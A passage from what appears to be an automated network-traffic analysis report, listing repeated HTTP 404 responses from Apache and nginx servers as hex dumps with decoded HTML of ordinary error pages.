2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 14:01:19 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 14:01:22 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 14:01:24 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404">
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 14:01:59 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 14:02:01 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 14:02:04 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 14:02:07 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 14:02:56 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 14:02:59 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 14:03:01 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 